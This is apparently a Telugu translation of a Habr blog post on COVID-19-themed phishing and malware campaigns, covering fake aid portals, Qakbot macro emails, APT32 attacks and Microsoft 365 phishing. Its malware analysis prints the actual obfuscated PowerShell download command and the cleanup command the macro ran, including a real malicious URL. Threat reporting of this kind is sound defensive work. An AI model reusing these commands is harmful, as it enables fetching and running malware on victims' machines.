అంటువ్యాధికి సంబంధించిన ప్రతిదానిపై తీవ్ర ఆసక్తి ఉన్న వినియోగదారులకు మరింత ఎక్కువ బెదిరింపులను సృష్టిస్తూ, దాడి చేసేవారు COVID-19 అంశాన్ని ఉపయోగించుకోవడం కొనసాగిస్తున్నారు. IN కరోనావైరస్ నేపథ్యంలో ఏ రకమైన మాల్వేర్ కనిపించిందనే దాని గురించి మేము ఇప్పటికే మాట్లాడాము మరియు ఈ రోజు రష్యాతో సహా వివిధ దేశాలలో వినియోగదారులు ఇప్పటికే ఎదుర్కొన్న సోషల్ ఇంజనీరింగ్ పద్ధతుల గురించి మాట్లాడుతాము. సాధారణ పోకడలు మరియు ఉదాహరణలు కట్ కింద ఉన్నాయి.
లో గుర్తుంచుకోండి ప్రజలు కరోనావైరస్ మరియు అంటువ్యాధి యొక్క కోర్సు గురించి మాత్రమే కాకుండా ఆర్థిక సహాయ చర్యల గురించి కూడా చదవడానికి సిద్ధంగా ఉన్నారనే వాస్తవం గురించి మేము మాట్లాడాము? ఇక్కడ ఒక మంచి ఉదాహరణ. జర్మన్ రాష్ట్రమైన నార్త్ రైన్-వెస్ట్ఫాలియా లేదా NRWలో ఆసక్తికరమైన ఫిషింగ్ దాడి కనుగొనబడింది. దాడి చేసిన వ్యక్తులు ఆర్థిక మంత్రిత్వ శాఖ వెబ్సైట్ కాపీలను సృష్టించారు (), ఆర్థిక సహాయం కోసం ఎవరైనా దరఖాస్తు చేసుకోవచ్చు. ఇటువంటి ప్రోగ్రామ్ వాస్తవానికి ఉనికిలో ఉంది మరియు ఇది స్కామర్లకు ప్రయోజనకరంగా మారింది. వారి బాధితుల వ్యక్తిగత డేటాను స్వీకరించిన తరువాత, వారు నిజమైన మంత్రిత్వ శాఖ వెబ్సైట్లో దరఖాస్తు చేసుకున్నారు, కానీ ఇతర బ్యాంక్ వివరాలను సూచించారు. అధికారిక సమాచారం ప్రకారం, పథకం కనుగొనబడే వరకు ఇటువంటి 4 వేల నకిలీ అభ్యర్థనలు చేయబడ్డాయి. ఫలితంగా, ప్రభావిత పౌరుల కోసం ఉద్దేశించిన $109 మిలియన్ మోసగాళ్ల చేతుల్లోకి వెళ్లింది.
మీరు COVID-19 కోసం ఉచిత పరీక్ష చేయాలనుకుంటున్నారా?
కరోనావైరస్ నేపథ్య ఫిషింగ్ యొక్క మరొక ముఖ్యమైన ఉదాహరణ ఇమెయిల్లలో. కరోనావైరస్ ఇన్ఫెక్షన్ కోసం ఉచిత పరీక్ష చేయించుకునే ఆఫర్తో సందేశాలు వినియోగదారుల దృష్టిని ఆకర్షించాయి. వీటి అనుబంధంలో Trickbot/Qakbot/Qbot యొక్క సందర్భాలు ఉన్నాయి. మరియు వారి ఆరోగ్యాన్ని తనిఖీ చేయాలనుకునే వారు "అటాచ్ చేసిన ఫారమ్ను పూరించడానికి" ప్రారంభించినప్పుడు, హానికరమైన స్క్రిప్ట్ కంప్యూటర్కు డౌన్లోడ్ చేయబడింది. మరియు శాండ్బాక్సింగ్ పరీక్షను నివారించడానికి, స్క్రిప్ట్ ప్రధాన వైరస్ను డౌన్లోడ్ చేయడం ప్రారంభించింది, కొంత సమయం తర్వాత, హానికరమైన కార్యాచరణ జరగదని రక్షణ వ్యవస్థలు నిర్ధారించినప్పుడు.
మాక్రోలను ఎనేబుల్ చేయడానికి చాలా మంది వినియోగదారులను ఒప్పించడం కూడా సులభం. దీన్ని చేయడానికి, ఒక ప్రామాణిక ట్రిక్ ఉపయోగించబడింది: ప్రశ్నాపత్రాన్ని పూరించడానికి, మీరు మొదట మాక్రోలను ప్రారంభించాలి, అంటే మీరు VBA స్క్రిప్ట్ని అమలు చేయాలి.
మీరు చూడగలిగినట్లుగా, VBA స్క్రిప్ట్ ప్రత్యేకంగా యాంటీవైరస్ల నుండి ముసుగు చేయబడింది.
Windows డిఫాల్ట్ “అవును” సమాధానాన్ని ఆమోదించడానికి ముందు అప్లికేషన్ /T <సెకనులు> వేచి ఉండే వెయిట్ ఫీచర్ని కలిగి ఉంది. మా విషయంలో, తాత్కాలిక ఫైల్లను తొలగించే ముందు స్క్రిప్ట్ 65 సెకన్లు వేచి ఉంది:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
మరియు వేచి ఉండగా, మాల్వేర్ డౌన్లోడ్ చేయబడింది. దీని కోసం ప్రత్యేక PowerShell స్క్రిప్ట్ ప్రారంభించబడింది:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Base64 విలువను డీకోడ్ చేసిన తర్వాత, PowerShell స్క్రిప్ట్ జర్మనీ నుండి గతంలో హ్యాక్ చేయబడిన వెబ్ సర్వర్లో ఉన్న బ్యాక్డోర్ను డౌన్లోడ్ చేస్తుంది:
http://automatischer-staubsauger.com/feature/777777.pngమరియు దానిని పేరుతో సేవ్ చేస్తుంది:
C:UsersPublictmpdirfile1.exe
ఫోల్డర్ ‘C:UsersPublictmpdir’ కమాండ్ను కలిగి ఉన్న 'tmps1.bat' ఫైల్ను అమలు చేస్తున్నప్పుడు తొలగించబడుతుంది cmd /c mkdir ""C:UsersPublictmpdir"".
ప్రభుత్వ సంస్థలపై లక్ష్యంగా దాడి
అదనంగా, FireEye విశ్లేషకులు ఇటీవల వుహాన్లోని ప్రభుత్వ నిర్మాణాలను, అలాగే చైనా అత్యవసర నిర్వహణ మంత్రిత్వ శాఖను లక్ష్యంగా చేసుకున్న APT32 దాడిని నివేదించారు. పంపిణీ చేయబడిన RTFలలో ఒకటి న్యూయార్క్ టైమ్స్ కథనానికి లింక్ను కలిగి ఉంది . అయితే, దానిని చదివిన తర్వాత, మాల్వేర్ డౌన్లోడ్ చేయబడింది (ఫైర్ ఐ విశ్లేషకులు ఈ ఉదాహరణను METALJACKగా గుర్తించారు).
ఆసక్తికరంగా, వైరస్టోటల్ ప్రకారం, గుర్తించే సమయంలో, యాంటీవైరస్లు ఏవీ ఈ ఉదాహరణను గుర్తించలేదు.
అధికారిక వెబ్సైట్లు డౌన్లో ఉన్నప్పుడు
ఫిషింగ్ దాడికి అత్యంత అద్భుతమైన ఉదాహరణ మరుసటి రోజు రష్యాలో జరిగింది. దీనికి కారణం 3 నుండి 16 సంవత్సరాల వయస్సు పిల్లలకు దీర్ఘకాలంగా ఎదురుచూస్తున్న ప్రయోజనం యొక్క నియామకం. మే 12, 2020న దరఖాస్తులను స్వీకరించడం ప్రారంభించినట్లు ప్రకటించినప్పుడు, లక్షలాది మంది దీర్ఘకాలంగా ఎదురుచూస్తున్న సహాయం కోసం స్టేట్ సర్వీసెస్ వెబ్సైట్కి చేరుకున్నారు మరియు ప్రొఫెషనల్ DDoS దాడి కంటే అధ్వాన్నంగా పోర్టల్ను తీసుకువచ్చారు. "ప్రభుత్వ సేవలు దరఖాస్తుల ప్రవాహాన్ని తట్టుకోలేవు" అని అధ్యక్షుడు చెప్పినప్పుడు, ప్రజలు దరఖాస్తులను అంగీకరించడానికి ప్రత్యామ్నాయ సైట్ను ప్రారంభించడం గురించి ఆన్లైన్లో మాట్లాడటం ప్రారంభించారు.
సమస్య ఏమిటంటే, అనేక సైట్లు ఒకేసారి పని చేయడం ప్రారంభించాయి మరియు ఒకటి, posobie16.gosuslugi.ruలోని నిజమైనది, వాస్తవానికి అప్లికేషన్లను అంగీకరిస్తుంది, మరిన్ని .
SearchInform నుండి సహచరులు .ru జోన్లో దాదాపు 30 కొత్త మోసపూరిత డొమైన్లను కనుగొన్నారు. ఇన్ఫోసెక్యూరిటీ మరియు సాఫ్ట్లైన్ కంపెనీ ఏప్రిల్ ప్రారంభం నుండి ఇలాంటి 70 కంటే ఎక్కువ నకిలీ ప్రభుత్వ సేవా వెబ్సైట్లను ట్రాక్ చేశాయి. వాటి సృష్టికర్తలు తెలిసిన చిహ్నాలను తారుమారు చేస్తారు మరియు గోసుస్లుగి, గోసుస్లుగి-16, వైప్లాటీ, కోవిడ్-వైప్లాటీ, పోసోబీ మొదలైన పదాల కలయికలను కూడా ఉపయోగిస్తారు.
హైప్ మరియు సోషల్ ఇంజనీరింగ్
ఈ ఉదాహరణలన్నీ అటాకర్లు కరోనావైరస్ అంశాన్ని విజయవంతంగా మానిటైజ్ చేస్తున్నాయని మాత్రమే నిర్ధారిస్తాయి. మరియు ఎక్కువ సామాజిక ఉద్రిక్తత మరియు మరింత అస్పష్టమైన సమస్యలు, స్కామర్లు ముఖ్యమైన డేటాను దొంగిలించడానికి, వ్యక్తులను వారి స్వంత డబ్బును విడిచిపెట్టమని లేదా మరిన్ని కంప్యూటర్లను హ్యాక్ చేయడానికి ఎక్కువ అవకాశాలు ఉంటాయి.
మరియు మహమ్మారి సంసిద్ధత లేని వ్యక్తులను సామూహికంగా ఇంటి నుండి పని చేయమని బలవంతం చేసింది, వ్యక్తిగతంగా మాత్రమే కాకుండా కార్పొరేట్ డేటా కూడా ప్రమాదంలో ఉంది. ఉదాహరణకు, ఇటీవల మైక్రోసాఫ్ట్ 365 (గతంలో ఆఫీస్ 365) వినియోగదారులు కూడా ఫిషింగ్ దాడికి గురయ్యారు. అక్షరాలకు అటాచ్మెంట్లుగా ప్రజలు భారీ “తప్పిపోయిన” వాయిస్ సందేశాలను అందుకున్నారు. అయితే, ఫైళ్లు నిజానికి దాడి బాధితులను పంపిన HTML పేజీ . ఫలితంగా, ఖాతా నుండి మొత్తం డేటా యాక్సెస్ మరియు రాజీ కోల్పోవడం.
మూలం: www.habr.com